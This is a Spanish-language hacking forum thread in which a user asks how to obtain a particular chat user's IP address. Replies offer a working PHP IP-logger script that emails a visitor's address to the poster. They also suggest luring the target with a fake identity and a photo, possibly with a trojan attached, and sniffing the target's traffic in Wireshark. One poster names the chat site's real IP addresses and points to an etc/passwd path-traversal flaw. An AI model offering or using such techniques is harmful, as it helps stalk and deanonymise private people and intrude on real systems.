Hola una duda que me asalta de mucho tiempo claro no conocia indetectables en ese entonces ni estaba tan envuelto en esto pero no se si exista una forma porque hace poco leí un articulo en alguna parte que si se podía con netcat aunque no lo entendi pero si alguien sabe lamanera de conseguir el ip de un usuario en un chat de java podría colaborarme con eso por favor? si necesitan
la pagina en especifico es redplaneta.com o planeta chat es lo mismo. gracias y saludos a todos
Última edición por himura el 09 Nov 2009, 01:07, editado 1 vez en total.
quiero ser de los mejores aunque me lleve la vida entera
se ve dificil...netstat funciona si puedes enviarle algun archivo pero ese chat creo que no tiene esa opcion..
otroyomismo escribió:se ve dificil...netstat funciona si puedes enviarle algun archivo pero ese chat creo que no tiene esa opcion..
pues no, no se puede enviar archivos, y pues he estado consultando según se puede y no se de q manera con el netcat aunque no entendi el tutorial, pero alguien q usa linux me dijo q si se podia q a cada usuario al ingresar se le asigna un ip y q uno puedo saber de alguna forma eso pero me nego la ayuda pues el se cree dios y no exagero
creeme que si el lo supiera de verdad ,te lo hubiese dicho..no es informacion tan importante,una ip no significa nada.
busca en google lo que es netcat.. no creo que ese programa te ayude en nada...tiene miles de funciones y hasta algunas que ni se conocen , te puede ayudar a escanear la pagina ,pero llegar a la ip que te interesa lo veo muy dificil. mas facil veo que lleves a la persona que te interesa a un privado,si es hombre haste pasar por mujer o viceversa,en el privado le das tu mail..se lo pides a el o a ella o al indeterminado y por msn le preguntas ¿ quieres saber como soy?.. y le mandas una foto... en ese momento usas netstat y sabras su ip.. ahora si le mandas esa foto con un troyano y te resulta ... mejor.
Podrían empezar reconociendo el udp y luego abrirle un privado filtrando ese mismo puerto en el protocol de Wireshark por ejemplo.
No todos funcionan de la misma manera, cuestión de experimentar.
Cold escribió:Podrían empezar reconociendo el udp y luego abrirle un privado filtrando ese mismo puerto en el protocol de Wireshark por ejemplo.
No todos funcionan de la misma manera, cuestión de experimentar.
uff por fin alguien se apiada de mi.... podrias darme una idea de como puede ser la identificacion del udp? gracias
aaaaaah bueeeee...si estamos con eso ..

sube esto a una web que soporte php :

<?php
$tumail="tudireccion @decorreo.com";

mail($tumail, "Direccion IP", "IP: ".$_SERVER["REMOTE_ADDR"]);

?>

cambias "tudireccion @decorreo.com" por tu correo y le mandas el link
la ip llega a tu correo.
posiblemente, te digo, mira busca un scanner de web. (O si eres mas experto
fijate en el codigo)

El caso de que uses el scanner, analizale la parte de mysql que es
los chats.. etc.. cosas de conexion.. asin seguro que lo averiguas

Ahora edito mi mensaje y te doy los datos.

Skillmax escribió:posiblemente, te digo, mira busca un scanner de web. (O si eres mas experto
fijate en el codigo)

jajaja gracias a ambos, bueno aun no lo hago pero estoy pendiente del foro cual scanner me recomiendas( que no sea en chino ehh?) jajaja y una explicacion si? si se puede no he probado a esta parte y pues como monto ese php q me dejo otroyomismo?
Mira el que yo usaba cuando era un novatillo..

Shadow security Scanner, la verdad tiene para inyecciones y todo.

Si quieres pon en google, tutoriales y el nombre del scanner, salen muchos.

He analizado la web, y tiene muchos fallos, muchos no, lo siguiente
Ojo, que tenga fallos no significa que los vaya a explotar.

jajaj Skillmax entonces ayudameeeeee jajaja de vdd como es ese Shadow Security Scanner lo lei en hack por crack 2 o 3 creo no estoy seguro pero vere como es jajaja demas dijiste q darias los datos

IP de la web > 74.208.154.218
IP del chat > 64.13.158.20

mmm pues si esos son los datos.... ni idea de q hacer
Bueno no se que quieres conseguir sabiendo la IP..

Peor bueno tambien me he parado a ver sus vulneabilidades
te dejo donde estan los fallos..

[Enlace externo eliminado para invitados] ... etc.passwd

[Enlace externo eliminado para invitados]?

Bueno esas son las partes mas vulnerables.

jajaja bueno no se explotar fallos necesito clases, pues no se q hacer con eso a ver q consigo
Cerrado

Volver a “Mensajes Entre Nosotros”